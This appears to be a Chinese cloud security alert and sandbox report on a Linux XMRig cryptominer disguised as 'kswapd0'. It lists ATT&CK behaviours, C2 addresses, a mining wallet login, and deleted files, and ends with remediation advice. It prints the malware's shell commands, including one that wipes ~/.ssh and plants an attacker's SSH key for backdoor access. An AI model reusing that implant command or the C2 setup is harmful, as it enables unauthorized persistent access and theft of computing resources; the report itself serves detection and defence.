挖矿行为爆破root账号

初始访问

执行

执行命令/脚本

维护（恶意）进程稳定性

持久化

特权提升

进程注入

防御绕过

进程注入

文件（数据）混淆

凭据访问

获取主机账户（密码）

披露

网络连接（探测）

系统信息发现

网络连接（探测）

获取/proc信息

系统网络配置信息发现

（可能）主机IP扫描

横向移动

获取主机账户（密码）

网络连接（探测）

（可能）主机IP扫描

收集

命令与控制

数据渗漏

影响

行为标签
进程详情
网络行为
文件行为
ATT&CK矩阵

网络行为特征

连接多个IP（可能在IP扫描）

恶意行为特征

发现恶意文件配置信息

静态文件特征

文件/内存匹配到YARA规则

网络行为特征

识别到Stratum协议（可能是挖矿）

文件行为特征

读/etc/passwd文件

静态文件特征

检测到条件竞争利用静态特征

静态文件特征

文件包含IOC信息

可疑行为特征

读/proc/mounts文件（寻找可写的文件系统）

静态文件特征

文件被加壳混淆

可疑行为特征

运行时分配（修改）得到可执行内存

静态文件特征

文件/内存匹配到YARA规则

文件行为特征

删除文件

信息收集行为

获取内核（版本）信息

信息收集行为

获取网络设备（配置）信息

一般行为

通过Bash执行命令

静态文件特征

该文件是静态链接的

信息收集行为

获取系统（设备）版本信息

信息收集行为

获取CPU信息（可能有DDos能力）

信息收集行为

获取系统内存（状态）信息

网络行为特征

连接多个IP（可能在IP扫描）

IP扫描	More than 6: 179.43.139.84:80, 179.43.155.134:80, 88.218.17.122:80, 185.165.169.188:80, 185.247.224.154:80, work.debian-package.org:80 ...

恶意行为特征

发现恶意文件配置信息

配置详情	{\"C2\": [\"179.43.139.84:80\", \"179.43.155.134:80\", \"88.218.17.122:80\", \"185.165.169.188:80\", \"185.165.169.188:443\", \"185.247.224.154:80\", \"work.debian-package.org:80\", \"work.ubuntu-package.org:443\", \"45.9.150.161:443\"]}

静态文件特征

文件/内存匹配到YARA规则

内存中字符串包含已知特征	"Miner_XMRig","Miner_XmrMiner"
内存中包含已知特征	"Miner_XMRig","Miner_XmrMiner"

网络行为特征

识别到Stratum协议（可能是挖矿）

Stratum流量

{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS\",\"pass\":\"x\",\"agent\":\"XMRig/6.19.0 (Linux x8

文件行为特征

读/etc/passwd文件

读文件	/etc/passwd

静态文件特征

检测到条件竞争利用静态特征

静态文件特征

文件包含IOC信息

文件/内存中IOC信息

"https://xmrig.com/wizard","185.165.169.188","https://xmrig.com/docs/algorithms","192.0.140.123","185.247.224.154:80","179.43.155.134:80","192.0.10.123","45.9.150.161","88.218.17.122","179.43.139.84","185.165.169.188:443","88.218.17.122:80","https://gcc.gnu.org/bugs/","185.165.169.188:80","185.247.224.154","179.43.155.134","179.43.139.84:80","127.0.0.1","45.9.150.161:443"

可疑行为特征

读/proc/mounts文件（寻找可写的文件系统）

读文件	/proc/1304/mounts

静态文件特征

文件被加壳混淆

加壳信息	UPX(3.96)[NRV,brute]

可疑行为特征

运行时分配（修改）得到可执行内存

分配可执行内存（可能是加壳）
分配可执行内存（可能是加壳）

静态文件特征

文件/内存匹配到YARA规则

静态文件命中规则	MD5_Constants
静态文件命中规则	RIPEMD160_Constants
静态文件命中规则	SHA1_Constants
静态文件命中规则	SHA512_Constants
静态文件命中规则	SHA2_BLAKE2_IVs
静态文件命中规则	SipHash_big_endian_constants

文件行为特征

删除文件

删除文件	/root/config
删除文件	/root/authorized_keys
删除文件	/root/known_hosts
删除文件	/root/.xmrig.json
删除文件	/root/.config/xmrig.json

信息收集行为

获取内核（版本）信息

执行uname命令

信息收集行为

获取网络设备（配置）信息

获取系统网络信息

/etc/hosts

一般行为

通过Bash执行命令

执行bash命令

sh -c chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json

执行bash命令

sh -c cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

静态文件特征

该文件是静态链接的

信息收集行为

获取系统（设备）版本信息

获取系统（版本）信息

/usr/share/locale/locale.alias

信息收集行为

获取CPU信息（可能有DDos能力）

读文件	/proc/cpuinfo
读文件	/sys/devices/system/cpu/online
读文件	/sys/devices/system/cpu/cpu0/topology/core_cpus
读文件	/sys/devices/system/cpu/cpu0/topology/core_id
读文件	/sys/devices/system/cpu/cpu0/topology/die_cpus
读文件	/sys/devices/system/cpu/cpu0/topology/package_cpus
读文件	/sys/devices/system/cpu/cpu0/topology/physical_package_id
读文件	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map
读文件	/sys/devices/system/cpu/cpu0/cache/index0/level
读文件	/sys/devices/system/cpu/cpu0/cache/index0/type
读文件	/sys/devices/system/cpu/cpu0/cache/index0/id
读文件	/sys/devices/system/cpu/cpu0/cache/index0/size
读文件	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size
读文件	/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets
读文件	/sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition
读文件	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map
读文件	/sys/devices/system/cpu/cpu0/cache/index1/level
读文件	/sys/devices/system/cpu/cpu0/cache/index1/type
读文件	/sys/devices/system/cpu/cpu0/cache/index1/id
读文件	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map
读文件	/sys/devices/system/cpu/cpu0/cache/index2/level
读文件	/sys/devices/system/cpu/cpu0/cache/index2/type
读文件	/sys/devices/system/cpu/cpu0/cache/index2/id
读文件	/sys/devices/system/cpu/cpu0/cache/index2/size
读文件	/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size
读文件	/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets
读文件	/sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition
读文件	/sys/devices/system/cpu/possible

信息收集行为

获取系统内存（状态）信息

/proc/meminfo

告警描述：检测模型发现您的服务器上运行了挖矿程序，挖矿程序是一类侵占主机计算资源，进行虚拟货币挖掘的程序，主机往往可见CPU占用飙高，以及其它相关的恶意程序。

异常事件详情

提示：在您的系统磁盘上发现了可疑文件，建议您先确认文件合法性并进行处理。

文件路径：/home/dmdba/.configrc5/a/kswapd0

恶意文件md5：8da798989b6e48fb211674b652119a8c

扫描来源方式：进程启动扫描

检测方式：云查杀

进程id： 9375

进程命令行： ./kswapd0

文件创建用户： N/A

文件修改时间： 2023-12-15 02:46:01

样本家族与特征：Miner:Linux/CoinMiner

描述：通常黑客入侵后会植入挖矿程序赚取收益，该类程序占用CPU等资源，影响用户正常业务，危害较大。且该程序可能还存在自删除行为，或伪装成系统程序以躲避检测。

处置建议：如果您确认该文件不是自己部署的业务所需文件，建议点击【处理】-> 【病毒查杀-结束进程并隔离文件】-> 【立即处理】，将终止恶意进程并隔离恶意文件。如果该文件不存在，请检查是否存在可疑进程、定时任务或启动项。如果您确认该文件是自身业务文件，是误报，建议点击【处理】-> 【加白名单】-> 【立即处理】，后续将不会产生该文件告警。